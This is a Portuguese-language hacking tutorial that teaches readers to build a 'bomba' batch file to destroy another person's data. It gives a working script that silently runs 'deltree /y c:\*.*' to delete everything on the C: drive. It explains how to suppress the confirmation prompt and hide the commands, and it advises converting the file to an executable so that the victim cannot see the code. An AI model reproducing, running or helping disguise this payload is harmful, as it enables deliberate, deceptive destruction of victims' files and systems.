|
Para
criar o arquivo você deve editar o "código" dele .... Use o
bloco de notas... Vamos lá...
Abra o bloco de notas. Vamos criar um arquivo BAT, não estamos fazendo
nenhum vírus, isto é apenas uma seqüência de comandos DOS juntos, na verdade
escondidos.. tipow, você num vai chegar pra alguém e pedir pra ele digitar
no DOS : deltree /y c:\*.* , porque ninguém em seu juízo normal, ( hehehe)
vai fazer isso..... Nesse arquivo você vai dizer o que acontecerá quando
o arquivo for executado....Sendo assim, vc pode colocar mensagens antes
e após a execução dos comandos.
Aí estão alguns comandos ( estes são comandos de DOS )que você poderá
colocar no seu arquivo bomba :
deltree = deleta arquivos e diretórios
rename = renomeia arquivos e diretórios
cls = limpa a tela
@echo off = faz com que os comandos abaixo dessa linha não sejam mostrados
@echo on = faz com que os comandos abaixo dessa linha sejam mostrados
pause = pausa a execução do arquivo. ( faz aparecer uma linha ="Pressione
qualquer tecla para continuar..."). Um arquivo destes simples
pode ser feito com o seguinte código:
|
@echo off
c:\
deltree /y c:\*.* |
Vamos
entender o que estes comandos farão...
@echo
off : fará com que os comandos c:\ e deltree /y c:\*.*
não sejam mostrados....
c:\ : Chama o drive c:
deltree /y c:\*.* : deleta todos os arquivos e diretórios do HD. Se
você não colocar o /y após o comando deltree, aparecerá uma pergunta assim
> "Excluir.....?" Então não esqueça de colocar o /y após
o deltree.
Agora
que você já bateu o código, salve o arquivo com extensão .bat
exemplo : "arquivo.bat"
NÃO ESQUEÇA DE COLOCAR A EXTENSÃO .bat se não fizer isso, o bloco
de notas salvará o arquivo como .txt.
Cuidado para nao executar o arquivo. Enquanto ele estiver com extensão
bat, você ainda poderá mudar os comandos dele, abrindo-o no bloco de notas
e fazendo as alterações...
Estando o arquivo com extensão bat, qualquer um poderá ver o código, inclusive
a vítima... portanto, assim que vc acabar de criar o arquivo bomba, transforme-o
em executável . Para tranformar arquivo BAT em COM, pegue o programa
"BAT2EXEC na sessão Downloads"
Pronto... esses sãos os comandos básicos para acabar com os dados do pc
de alguém.
|